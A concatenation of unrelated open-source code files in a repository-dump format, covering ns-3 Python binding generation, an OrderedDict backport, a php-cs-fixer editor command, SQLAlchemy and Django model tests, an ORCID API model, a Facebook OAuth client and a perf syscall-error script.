'ns3::Callback<%s>' % ', '.join(self.TEMPLATE_ARGS),
self.name+'_value',
self.default_value)
wrapper.before_call.write_code("if (%s) {" % (py_callback,))
wrapper.before_call.indent()
wrapper.before_call.write_error_check(
'!PyCallable_Check(%s)' % py_callback,
'PyErr_SetString(PyExc_TypeError, "parameter \'%s\' must be callable");' % self.name)
wrapper.before_call.write_code("%s = ns3::Callback<%s> (ns3::Create<%s> (%s));"
% (value, ', '.join(self.TEMPLATE_ARGS),
self.PYTHON_CALLBACK_IMPL_NAME, py_callback))
wrapper.before_call.unindent()
wrapper.before_call.write_code("}") # closes: if (py_callback) {
wrapper.call_params.append(value)
def convert_c_to_python(self, wrapper):
raise typehandlers.NotSupportedError("Reverse wrappers for ns3::Callback<...> types "
"(python using callbacks defined in C++) not implemented.")
def generate_callback_classes(module, callbacks):
out = module.after_forward_declarations
for callback_impl_num, template_parameters in enumerate(callbacks):
sink = MemoryCodeSink()
cls_name = "ns3::Callback< %s >" % ', '.join(template_parameters)
#print >> sys.stderr, "***** trying to register callback: %r" % cls_name
class_name = "PythonCallbackImpl%i" % callback_impl_num
sink.writeln('''
class %s : public ns3::CallbackImpl<%s>
{
public:
PyObject *m_callback;
%s(PyObject *callback)
{
Py_INCREF(callback);
m_callback = callback;
}
virtual ~%s()
{
PyGILState_STATE __py_gil_state;
__py_gil_state = (PyEval_ThreadsInitialized() ? PyGILState_Ensure() : (PyGILState_STATE) 0);
Py_DECREF(m_callback);
m_callback = NULL;
PyGILState_Release(__py_gil_state);
}
virtual bool IsEqual(ns3::Ptr<const ns3::CallbackImplBase> other_base) const
{
const %s *other = dynamic_cast<const %s*> (ns3::PeekPointer (other_base));
if (other != NULL)
return (other->m_callback == m_callback);
else
return false;
}
''' % (class_name, ', '.join(template_parameters), class_name, class_name, class_name, class_name))
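# For example (a sketch): template_parameters == ['void', 'int'] emits a C++
# class PythonCallbackImpl0 deriving from ns3::CallbackImpl<void, int>, whose
# generated operator() forwards the call into the stored Python callable via
# Py_BuildValue/PyObject_CallObject (see CallbackImplProxyMethod above).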
sink.indent()
callback_return = template_parameters[0]
return_ctype = ctypeparser.parse_type(callback_return)
if ('const' in return_ctype.remove_modifiers()):
kwargs = {'is_const': True}
else:
kwargs = {}
try:
return_type = ReturnValue.new(str(return_ctype), **kwargs)
except (typehandlers.TypeLookupError, typehandlers.TypeConfigurationError) as ex:
warnings.warn("***** Unable to register callback; Return value '%s' error (used in %s): %r"
% (callback_return, cls_name, ex),
Warning)
continue
arguments = []
ok = True
callback_parameters = [arg for arg in template_parameters[1:] if arg != 'ns3::empty']
for arg_num, arg_type in enumerate(callback_parameters):
arg_name = 'arg%i' % (arg_num+1)
param_ctype = ctypeparser.parse_type(arg_type)
if ('const' in param_ctype.remove_modifiers()):
kwargs = {'is_const': True}
else:
kwargs = {}
try:
arguments.append(Parameter.new(str(param_ctype), arg_name, **kwargs))
except (typehandlers.TypeLookupError, typehandlers.TypeConfigurationError) as ex:
warnings.warn("***** Unable to register callback; parameter '%s %s' error (used in %s): %r"
% (arg_type, arg_name, cls_name, ex),
Warning)
ok = False
if not ok:
try:
typehandlers.return_type_matcher.lookup(cls_name)[0].DISABLED = True
except typehandlers.TypeLookupError:
pass
try:
typehandlers.param_type_matcher.lookup(cls_name)[0].DISABLED = True
except typehandlers.TypeLookupError:
pass
continue
wrapper = CallbackImplProxyMethod(return_type, arguments)
wrapper.generate(sink, 'operator()', decl_modifiers=[])
sink.unindent()
sink.writeln('};\n')
print("Flushing to ", out, file=sys.stderr)
sink.flush_to(out)
# def write_preamble(out):
# pybindgen.write_preamble(out)
# out.writeln("#include \"ns3/everything.h\"")
def Simulator_customizations(module):
Simulator = module['ns3::Simulator']
## Simulator::Schedule(delay, callback, ...user..args...)
Simulator.add_custom_method_wrapper("Schedule", "_wrap_Simulator_Schedule",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
## Simulator::ScheduleNow(callback, ...user..args...)
Simulator.add_custom_method_wrapper("ScheduleNow", "_wrap_Simulator_ScheduleNow",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
## Simulator::ScheduleDestroy(callback, ...user..args...)
Simulator.add_custom_method_wrapper("ScheduleDestroy", "_wrap_Simulator_ScheduleDestroy",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
Simulator.add_custom_method_wrapper("Run", "_wrap_Simulator_Run",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
def CommandLine_customizations(module):
CommandLine = module['ns3::CommandLine']
CommandLine.add_method('Parse', None, [ArgvParam(None, 'argv')],
is_static=False)
CommandLine.add_custom_method_wrapper("AddValue", "_wrap_CommandLine_AddValue",
flags=["METH_VARARGS", "METH_KEYWORDS"])
def Object_customizations(module):
## ---------------------------------------------------------------------
## Here we generate custom constructor code for all classes that
## derive from ns3::Object. The custom constructors are needed in
## order to support kwargs only and to translate kwargs into ns3
## attributes, etc.
## ---------------------------------------------------------------------
try:
Object = module['ns3::Object']
except KeyError:
return
## add a GetTypeId method to all generated helper classes
def helper_class_hook(helper_class):
decl = """
static ns3::TypeId GetTypeId (void)
{
static ns3::TypeId tid = ns3::TypeId ("%s")
.SetParent< %s > ()
;
return tid;
}""" % (helper_class.name, helper_class.class_.full_name)
helper_class.add_custom_method(decl)
helper_class.add_post_generation_code(
"NS_OBJECT_ENSURE_REGISTERED (%s);" % helper_class.name)
Object.add_helper_class_hook(helper_class_hook)
def ns3_object_instance_creation_function(cpp_class, code_block, lvalue,
parameters, construct_type_name):
assert lvalue
assert not lvalue.startswith('None')
if cpp_class.cannot_be_constructed:
raise CodeGenerationError("%s cannot be constructed (%s)"
% cpp_class.full_name)
if cpp_class.incomplete_type:
raise CodeGenerationError("%s cannot be constructed (incomplete type)"
% cpp_class.full_name)
code_block.write_code("%s = new %s(%s);" % (lvalue, construct_type_name, parameters))
code_block.write_code("%s->Ref ();" % (lvalue))
def ns3_object_post_instance_creation_function(cpp_class, code_block, lvalue,
parameters, construct_type_name):
code_block.write_code("ns3::CompleteConstruct(%s);" % (lvalue, ))
Object.set_instance_creation_function(ns3_object_instance_creation_function)
Object.set_post_instance_creation_function(ns3_object_post_instance_creation_function)
def Attribute_customizations(module):
# Fix up for the "const AttributeValue &v = EmptyAttribute()"
# case, as used extensively by helper classes.
# Here's why we need to do this: pybindgen.gccxmlscanner, when
# scanning parameter default values, is only provided with the
# value as a simple C expression string. (py)gccxml does not
# report the type of the default value.
# As a workaround, here we iterate over all parameters of all
# methods of all classes and tell pybindgen what is the type of
# the default value for attributes.
for cls in module.classes:
for meth in cls.get_all_methods():
for param in meth.parameters:
if isinstance(param, cppclass.CppClassRefParameter):
if param.cpp_class.name == 'AttributeValue' \
and param.default_value is not None \
and param.default_value_type is None:
param.default_value_type = 'ns3::EmptyAttributeValue'
def TypeId_customizations(module):
TypeId = module['ns3::TypeId']
TypeId.add_custom_method_wrapper("LookupByNameFailSafe", "_wrap_TypeId_LookupByNameFailSafe",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
def add_std_ofstream(module):
module.add_include('<fstream>')
ostream = module.add_class('ostream', foreign_cpp_namespace='::std')
ostream.set_cannot_be_constructed("abstract base class")
ofstream = module.add_class('ofstream', foreign_cpp_namespace='::std', parent=ostream)
ofstream.add_enum('openmode', [
('app', 'std::ios_base::app'),
('ate', 'std::ios_base::ate'),
('binary', 'std::ios_base::binary'),
('in', 'std::ios_base::in'),
('out', 'std::ios_base::out'),
('trunc', 'std::ios_base::trunc'),
])
ofstream.add_constructor([Parameter.new("const char *", 'filename'),
Parameter.new("::std::ofstream::openmode", 'mode', default_value="std::ios_base::out")])
ofstream.add_method('close', None, [])
add_std_ios_openmode(module)
class IosOpenmodeParam(Parameter):
DIRECTIONS = [Parameter.DIRECTION_IN]
CTYPES = ['std::ios::openmode', 'std::_Ios_Openmode']
def convert_c_to_python(self, wrapper):
assert isinstance(wrapper, ReverseWrapperBase)
wrapper.build_params.add_parameter('i', [self.value])
def convert_python_to_c(self, wrapper):
assert isinstance(wrapper, ForwardWrapperBase)
name = wrapper.declarations.declare_variable("std::ios::openmode", self.name, self.default_value)
wrapper.parse_params.add_parameter('i', ['&'+name], self.name, optional=bool(self.default_value))
wrapper.call_params.append(name)
def add_std_ios_openmode(module):
for flag in 'in', 'out', 'ate', 'app', 'trunc', 'binary':
module.after_init.write_code('PyModule_AddIntConstant(m, (char *) "STD_IOS_%s", std::ios::%s);'
% (flag.upper(), flag))
def add_ipv4_address_tp_hash(module):
module.body.writeln('''
long
_ns3_Ipv4Address_tp_hash (PyObject *obj)
{
PyNs3Ipv4Address *addr = reinterpret_cast<PyNs3Ipv4Address *> (obj);
return static_cast<long> (ns3::Ipv4AddressHash () (*addr->obj));
}
''')
module.header.writeln('long _ns3_Ipv4Address_tp_hash (PyObject *obj);')
module['Ipv4Address'].pytype.slots['tp_hash'] = "_ns3_Ipv4Address_tp_hash"
| gpl-2.0 |
hnoerdli/hussa | node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/ordered_dict.py | 2354 | 10366 | # Unmodified from http://code.activestate.com/recipes/576693/
# other than to add MIT license header (as specified on page, but not in code).
# Linked from Python documentation here:
# http://docs.python.org/2/library/collections.html#collections.OrderedDict
#
# This should be deleted once Py2.7 is available on all bots, see
# http://crbug.com/241769.
#
# Copyright (c) 2009 Raymond Hettinger.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
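# Illustrative layout (a sketch) after od['a'] = 1 and then od['b'] = 2:
#   root   = [link_b, link_a, None]    # the sentinel
#   link_a = [root,   link_b, 'a']
#   link_b = [link_a, root,   'b']
# so iteration simply follows the NEXT pointers: root -> 'a' -> 'b' -> root.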
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues() -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems() -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
# Suppress 'OrderedDict.update: Method has no argument':
# pylint: disable=E0211
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
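# e.g. (a sketch): after od.update([('a', 1), ('b', 2)], c=3) the keys iterate
# as ['a', 'b', 'c']; with several keyword arguments their relative order
# would be arbitrary, as warned above.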
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
| mit |
prisis/sublime-text-packages | Packages/anaconda_php/plugin/handlers_php/commands/php_cs_fixer.py | 3 | 1841 |
# Copyright (C) 2014 - Oscar Campos <[email protected]>
# This program is Free Software see LICENSE file for details
import os
import sys
import logging
import traceback
import subprocess
from commands.base import Command
from process import spawn
PIPE = subprocess.PIPE
class PHPCSFixer(Command):
"""Run phpcs linter and return back results
"""
def __init__(self, callback, uid, vid, filename, settings):
self.vid = vid
self.settings = settings
self.filename = filename
super(PHPCSFixer, self).__init__(callback, uid)
def run(self):
"""Run the command
"""
try:
self.callback({
'success': True,
'output': self.phpcs_fixer(),
'uid': self.uid,
'vid': self.vid
})
except Exception as error:
logging.error(error)
logging.debug(traceback.format_exc())
print(traceback.format_exc())
self.callback({
'success': False,
'error': error,
'uid': self.uid,
'vid': self.vid
})
def phpcs_fixer(self):
"""Run the php-cs-fixer command in a file
"""
phpcs_fixer = os.path.join(
os.path.dirname(__file__), '../linting/phpcs_fixer/php-cs-fixer')
args = [
'php', '-n', phpcs_fixer, 'fix', self.filename, '--level=all',
'-{}'.format(self.settings.get('phpcs_fixer_verbosity_level', 'v'))
] + self.settings.get('phpcs_fixer_additional_arguments', [])
proc = spawn(args, stdout=PIPE, stderr=PIPE, cwd=os.getcwd())
output, error = proc.communicate()
if sys.version_info >= (3, 0):
output = output.decode('utf8')
return output
| mit |
Thraxis/SickRage | lib/sqlalchemy/testing/suite/test_sequence.py | 76 | 3770 | from .. import fixtures, config
from ..config import requirements
from ..assertions import eq_
from ... import testing
from ... import Integer, String, Sequence, schema
from ..schema import Table, Column
class SequenceTest(fixtures.TablesTest):
__requires__ = ('sequences',)
__backend__ = True
run_create_tables = 'each'
@classmethod
def define_tables(cls, metadata):
Table('seq_pk', metadata,
Column('id', Integer, Sequence('tab_id_seq'), primary_key=True),
Column('data', String(50))
)
Table('seq_opt_pk', metadata,
Column('id', Integer, Sequence('tab_id_seq', optional=True),
primary_key=True),
Column('data', String(50))
)
def test_insert_roundtrip(self):
config.db.execute(
self.tables.seq_pk.insert(),
data="some data"
)
self._assert_round_trip(self.tables.seq_pk, config.db)
def test_insert_lastrowid(self):
r = config.db.execute(
self.tables.seq_pk.insert(),
data="some data"
)
eq_(
r.inserted_primary_key,
[1]
)
def test_nextval_direct(self):
r = config.db.execute(
self.tables.seq_pk.c.id.default
)
eq_(
r, 1
)
@requirements.sequences_optional
def test_optional_seq(self):
r = config.db.execute(
self.tables.seq_opt_pk.insert(),
data="some data"
)
eq_(
r.inserted_primary_key,
[1]
)
def _assert_round_trip(self, table, conn):
row = conn.execute(table.select()).first()
eq_(
row,
(1, "some data")
)
class HasSequenceTest(fixtures.TestBase):
__requires__ = 'sequences',
__backend__ = True
def test_has_sequence(self):
s1 = Sequence('user_id_seq')
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db,
'user_id_seq'), True)
finally:
testing.db.execute(schema.DropSequence(s1))
@testing.requires.schemas
def test_has_sequence_schema(self):
s1 = Sequence('user_id_seq', schema="test_schema")
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db,
'user_id_seq', schema="test_schema"), True)
finally:
testing.db.execute(schema.DropSequence(s1))
def test_has_sequence_neg(self):
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq'),
False)
@testing.requires.schemas
def test_has_sequence_schemas_neg(self):
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq',
schema="test_schema"),
False)
@testing.requires.schemas
def test_has_sequence_default_not_in_remote(self):
s1 = Sequence('user_id_seq')
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq',
schema="test_schema"),
False)
finally:
testing.db.execute(schema.DropSequence(s1))
@testing.requires.schemas
def test_has_sequence_remote_not_in_default(self):
s1 = Sequence('user_id_seq', schema="test_schema")
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq'),
False)
finally:
testing.db.execute(schema.DropSequence(s1))
| gpl-3.0 |
Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api_v3/models/amount_v30_rc1.py | 1 | 3888 | # coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AmountV30Rc1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'value': 'str',
'currency_code': 'str'
}
attribute_map = {
'value': 'value',
'currency_code': 'currency-code'
}
def __init__(self, value=None, currency_code=None): # noqa: E501
"""AmountV30Rc1 - a model defined in Swagger""" # noqa: E501
self._value = None
self._currency_code = None
self.discriminator = None
if value is not None:
self.value = value
self.currency_code = currency_code
@property
def value(self):
"""Gets the value of this AmountV30Rc1. # noqa: E501
:return: The value of this AmountV30Rc1. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this AmountV30Rc1.
:param value: The value of this AmountV30Rc1. # noqa: E501
:type: str
"""
self._value = value
@property
def currency_code(self):
"""Gets the currency_code of this AmountV30Rc1. # noqa: E501
:return: The currency_code of this AmountV30Rc1. # noqa: E501
:rtype: str
"""
return self._currency_code
@currency_code.setter
def currency_code(self, currency_code):
"""Sets the currency_code of this AmountV30Rc1.
:param currency_code: The currency_code of this AmountV30Rc1. # noqa: E501
:type: str
"""
if currency_code is None:
raise ValueError("Invalid value for `currency_code`, must not be `None`") # noqa: E501
self._currency_code = currency_code
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AmountV30Rc1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AmountV30Rc1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| mit |
mark-adams/django-socialregistration | socialregistration/contrib/facebook/client.py | 8 | 1296 | from django.conf import settings
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from socialregistration.clients.oauth import OAuth2
from socialregistration.settings import SESSION_KEY
import json
import facebook
class Facebook(OAuth2):
client_id = getattr(settings, 'FACEBOOK_APP_ID', '')
secret = getattr(settings, 'FACEBOOK_SECRET_KEY', '')
scope = getattr(settings, 'FACEBOOK_REQUEST_PERMISSIONS', '')
auth_url = 'https://www.facebook.com/dialog/oauth'
access_token_url = 'https://graph.facebook.com/oauth/access_token'
graph = None
_user_info = None
def get_callback_url(self, **kwargs):
if self.is_https():
return 'https://%s%s' % (Site.objects.get_current().domain,
reverse('socialregistration:facebook:callback'))
return 'http://%s%s' % (Site.objects.get_current().domain,
reverse('socialregistration:facebook:callback'))
def get_user_info(self):
if self._user_info is None:
self.graph = facebook.GraphAPI(self._access_token)
self._user_info = self.graph.request('me')
return self._user_info
@staticmethod
def get_session_key():
return '%sfacebook' % SESSION_KEY
| mit |
Tesla-Redux-Devices/hells-Core-N6 | tools/perf/scripts/python/failed-syscalls-by-pid.py | 11180 | 2058 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
| gpl-2.0 |
stopstalk/stopstalk-deployment | private/scripts/extras/backfill_problem_id.py | 1 | 1859 | """
Copyright (c) 2015-2020 Raj Patel([email protected]), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import time
ptable = db.problem
stable = db.submission
links = db(ptable).select(ptable.id, ptable.link)
plink_to_id = dict([(x.link, x.id) for x in links])
BATCH_SIZE = 25000
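# Paging sketch: web2py's limitby=(min, max) slices the result set, so
# iteration i covers submission rows [i * BATCH_SIZE, (i + 1) * BATCH_SIZE)
# and the table is processed without loading it all into memory at once.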
for i in xrange(10000):
rows = db(stable).select(limitby=(i * BATCH_SIZE, (i + 1) * BATCH_SIZE))
if not rows: break
print rows.first().id, rows.last().id,
updated = 0
for srecord in rows:
if srecord.problem_id is None and \
srecord.problem_link in plink_to_id:
srecord.update_record(problem_id=plink_to_id[srecord.problem_link])
updated += 1
if updated > 0:
db.commit()
time.sleep(0.1)
print "updated", updated
else:
print "no updates"
| mit |
lsqtongxin/django | tests/model_inheritance_regress/models.py | 243 | 5863 | from __future__ import unicode_literals
import datetime
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
class Meta:
ordering = ('name',)
def __str__(self):
return "%s the place" % self.name
@python_2_unicode_compatible
class Restaurant(Place):
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
def __str__(self):
return "%s the restaurant" % self.name
@python_2_unicode_compatible
class ItalianRestaurant(Restaurant):
serves_gnocchi = models.BooleanField(default=False)
def __str__(self):
return "%s the italian restaurant" % self.name
@python_2_unicode_compatible
class ParkingLot(Place):
# An explicit link to the parent (we can control the attribute name).
parent = models.OneToOneField(Place, models.CASCADE, primary_key=True, parent_link=True)
capacity = models.IntegerField()
def __str__(self):
return "%s the parking lot" % self.name
class ParkingLot2(Place):
# In lieu of any other connector, an existing OneToOneField will be
# promoted to the primary key.
parent = models.OneToOneField(Place, models.CASCADE)
class ParkingLot3(Place):
# The parent_link connector need not be the pk on the model.
primary_key = models.AutoField(primary_key=True)
parent = models.OneToOneField(Place, models.CASCADE, parent_link=True)
class ParkingLot4(models.Model):
# Test parent_link connector can be discovered in abstract classes.
parent = models.OneToOneField(Place, models.CASCADE, parent_link=True)
class Meta:
abstract = True
class ParkingLot4A(ParkingLot4, Place):
pass
class ParkingLot4B(Place, ParkingLot4):
pass
@python_2_unicode_compatible
class Supplier(models.Model):
name = models.CharField(max_length=50)
